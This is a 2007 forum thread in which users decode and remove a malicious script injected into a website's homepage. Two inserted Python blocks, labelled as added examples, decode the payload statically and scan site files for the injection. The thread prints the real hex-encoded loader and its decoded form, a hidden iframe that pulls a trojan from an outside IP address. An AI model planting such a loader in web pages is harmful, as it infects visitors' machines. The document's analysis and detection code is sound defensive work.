Security Issue - Read Please!

Started by Shadow, August 26, 2007, 06:44:59 PM

bjornredtail

Chances are he didn't. There may be some sort of file or shell exploit in some of the software running on the webserver that hosts this website.

Quote
// FUNC1: turn a two-digit hex string into its character code
function FUNC1(ARG1){
    return(parseInt(ARG1,16));
}
// FUNC2: walk the hex string two digits at a time and build the decoded text
function FUNC2(ARG2){
    var VARIBLE1 ='';
    for(COUNTER = 0; COUNTER<ARG2.length; COUNTER+=2){
        VARIBLE1 +=(String.fromCharCode(FUNC1(ARG2.substr(COUNTER, 2))));
    }
    return VARIBLE1;
}
// the decoded text is written straight into the page
document.write(FUNC2('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
A bit of a translation of the code... I'll try firing up my Linux box and executing it.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!

bjornredtail

Okay, first, in case the URL's auto link: DO NOT CLICK ANY LINK IN THE FOLLOWING POST. The URL is to the server that the hacked code points to.

Quote
<SCRIPT>window.status='Done';document.write('<iframe name=1a9c12 src=\'http://(adding_this_to_keep_link_from_working)58.65.235.153.(adding_this_to_keep_link_from_working)/~pozitive/ice/index.php?'+Math.round(Math.random()*80443)+'8d2fca7131\' width=781 height=103 style=\'display: none\'></iframe>')</SCRIPT>
That's what all that hex garbage translates to, minus the (adding_this_to_keep_link_from_working) part of course.

At the moment that server appears to be down...
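
The decoding bjornredtail did by hand in the two posts above, done statically in Python so that the injected script is never handed to a browser. This is an added example, not code from the thread or from the site's operators: `decode_hex_payload` mirrors FUNC2 (two hex digits per character), and `extract_indicators` pulls out what an analyst records from the result, namely the iframe, the URL it loads, the host, and whether the frame is hidden. The input is the hex string quoted in the post; the function names and the report layout are my own.

```python
import re
from urllib.parse import urlsplit

# The hex string quoted in the post above, i.e. the argument handed to FUNC2.
# It is only ever decoded as text here; nothing fetches from or executes the result.
INJECTED_HEX = (
    "3C5343524950543E"                                      # <SCRIPT>
    "77696E646F772E7374617475733D27446F6E65273B"            # window.status='Done';
    "646F63756D656E742E7772697465"                          # document.write
    "2827"                                                  # ('
    "3C696672616D65206E616D653D316139633132"                # <iframe name=1a9c12
    "207372633D5C27"                                        #  src=\'
    "687474703A2F2F35382E36352E3233352E313533"              # http://58.65.235.153
    "2F7E706F7A69746976652F6963652F696E6465782E7068703F"    # /~pozitive/ice/index.php?
    "272B4D6174682E726F756E64284D6174682E72616E646F6D2829"  # '+Math.round(Math.random()
    "2A3830343433292B27"                                    # *80443)+'
    "38643266636137313331"                                  # 8d2fca7131
    "5C272077696474683D373831"                              # \' width=781
    "206865696768743D313033"                                #  height=103
    "207374796C653D5C27646973706C61793A206E6F6E655C273E"    #  style=\'display: none\'>
    "3C2F696672616D653E2729"                                # </iframe>')
    "3C2F5343524950543E"                                    # </SCRIPT>
)


def decode_hex_payload(hex_string):
    """Do what FUNC2 does: take the string two hex digits at a time, turn each pair
    into a character code and join the characters.

    The original's parseInt() turns a bad pair into NaN, which fromCharCode renders
    as a NUL, so corruption disappears silently; here a bad pair raises instead.
    An odd trailing digit is accepted, as parseInt accepts it too.
    """
    chars = []
    for offset in range(0, len(hex_string), 2):
        pair = hex_string[offset:offset + 2]
        try:
            chars.append(chr(int(pair, 16)))
        except ValueError:
            raise ValueError(f"non-hex pair {pair!r} at offset {offset}") from None
    return "".join(chars)


IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# src value, tolerating the backslash-escaped quotes of a document.write() string literal
SRC_RE = re.compile(r'''src=\\?['"]?([^'"\\\s>]+)''', re.I)
# frame hidden by CSS or collapsed to zero size
HIDDEN_RE = re.compile(r'''display\s*:\s*none|(?:width|height)\s*=\s*['"]?0\b''', re.I)


def extract_indicators(decoded_script):
    """Pull out what an analyst records from the decoded script: every iframe,
    the URL each one loads, the hosts involved and whether the frame is hidden."""
    frames = IFRAME_RE.findall(decoded_script)
    sources = []
    for frame in frames:
        match = SRC_RE.search(frame)
        if match:
            sources.append(match.group(1))
    hosts = sorted({urlsplit(src).hostname for src in sources} - {None})
    return {
        "iframe_count": len(frames),
        "sources": sources,
        "hosts": hosts,
        "hidden": any(HIDDEN_RE.search(frame) for frame in frames),
        # A random number appended to the URL defeats caching, so every visit is a fresh hit.
        "random_cachebuster": "Math.random()" in decoded_script,
    }


if __name__ == "__main__":
    script = decode_hex_payload(INJECTED_HEX)
    print(script)
    for key, value in extract_indicators(script).items():
        print(f"{key}: {value}")
```

Running the block prints the same decoded script bjornredtail posted, followed by the indicator summary; the host list is what goes into a block list or a search of the server's logs for outbound requests.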

Shadow

what does that mean?? :?

I'm computer illiterate for the most part
<=holbs-.. ..-holbs=> <=holbs-..

bjornredtail

The thing just prints all that hex stuff to the web page. Your browser turns it into the code I posted in the previous post, which in turn attempts to load a trojan horse from another server, which thankfully is down at the moment.

Shadow

I hope Retto can fix it... how hard is it to get rid of that code once he knows about it?

windhound

As easy as opening his FTP / SSH client, opening index.php in a text editor (notepad), highlighting the offending line, and pushing delete. Then of course pushing the save button.

The slight issue would be making sure it doesn't happen again, but it's more likely a problem with the server, which I'm assuming Retto has no control over.
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

bjornredtail

ssh rovl.org
...
login as: whatever
password:

...
vim index.php
j
j
j
j
...
dd
:wq
logout

Assuming of course that only the homepage was compromised. Still, if Retto wasn't in class at the moment, or if someone else had SSH access, it would have already been fixed.
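
The cleanup described by windhound and bjornredtail above deletes the one line they spotted in index.php. The two things it leaves open are the assumption that only the homepage was touched and windhound's point about making sure it doesn't come back. As an added example (not code from the thread or from the site), here is a Python checker that covers both: it scans every web file under a directory for the signatures of this particular injection (a `parseInt(x, 16)` decoder feeding `document.write`, and the hidden iframe it produces) and keeps a SHA-256 baseline of the files so a later run reports anything that changed. The sample site it builds is constructed for the demo, and the injected line's hex blob decodes to a harmless marker rather than the real payload; function names and signature labels are my own.

```python
import hashlib
import re
import tempfile
from pathlib import Path

WEB_SUFFIXES = (".php", ".html", ".htm", ".js")

# Signatures of the injection seen in this thread: a hex decoder built on parseInt(x, 16)
# that feeds document.write, and the hidden iframe it writes. They are specific to this
# incident, not a general malware rule set.
SIGNATURES = {
    "parseInt(..., 16) hex decoder": re.compile(r"parseInt\s*\(.*?,\s*16\s*\)"),
    "document.write of a long hex literal": re.compile(
        r"document\.write\s*\(.*['\"][0-9A-Fa-f]{40,}['\"]"),
    "hidden iframe": re.compile(r"<iframe\b[^>]*display\s*:\s*none", re.I),
}


def scan_text(text, name="<input>"):
    """Return (name, line number, signature label) for every line matching a signature."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((name, lineno, label))
    return hits


def web_files(root, suffixes=WEB_SUFFIXES):
    """Yield (relative path, Path) for every web file under root, in a stable order."""
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            yield path.relative_to(root).as_posix(), path


def scan_tree(root, suffixes=WEB_SUFFIXES):
    """Scan every web file, so 'only the homepage was hit' is checked rather than assumed."""
    hits = []
    for rel, path in web_files(root, suffixes):
        hits.extend(scan_text(path.read_text(errors="replace"), rel))
    return hits


def hash_tree(root, suffixes=WEB_SUFFIXES):
    """Baseline to store after cleanup: SHA-256 of every web file, keyed by relative path."""
    return {rel: hashlib.sha256(path.read_bytes()).hexdigest()
            for rel, path in web_files(root, suffixes)}


def manifest_diff(baseline, current):
    """Compare a stored baseline with a fresh hash_tree(); every difference is a file to inspect."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


# Constructed sample site (not the real files): a clean index.php, then the same file with
# one injected line of the shape seen in the thread. The hex blob decodes to a harmless
# marker string rather than the real payload.
CLEAN_INDEX = "<html><body><?php include 'news.php'; ?></body></html>\n"
SAMPLE_HEX = "<!-- constructed sample, not the real payload -->".encode().hex()
INJECTED_LINE = (
    "function h(s){var o='';for(i=0;i<s.length;i+=2)"
    "o+=String.fromCharCode(parseInt(s.substr(i,2),16));return o}"
    f"document.write(h('{SAMPLE_HEX}'))\n"
)


def demo():
    """Build the sample site, baseline it, inject the line, then scan and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(CLEAN_INDEX)
        (root / "news.php").write_text("<?php echo 'no news'; ?>\n")
        baseline = hash_tree(root)
        before = scan_tree(root)
        (root / "index.php").write_text(CLEAN_INDEX + INJECTED_LINE)
        after = scan_tree(root)
        changed = manifest_diff(baseline, hash_tree(root))
    return before, after, changed


if __name__ == "__main__":
    before, after, changed = demo()
    print("hits before injection:", before)
    for name, lineno, label in after:
        print(f"{name}:{lineno}: {label}")
    print("changed files:", changed)
```

In practice the baseline from `hash_tree` is written to a file kept outside the web root right after the cleanup, and a cron job reruns `scan_tree` and `manifest_diff` against it; the signature scan catches a repeat of this injection, while the hash diff catches anything else that edits the site's files, which matters here because the original entry point was never identified.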

bjornredtail

It appears as if the break-in has been successfully cleaned up. The malicious code has been replaced with a rather amusing comment.

Shadow

what is it lol - how much do you like kung fu?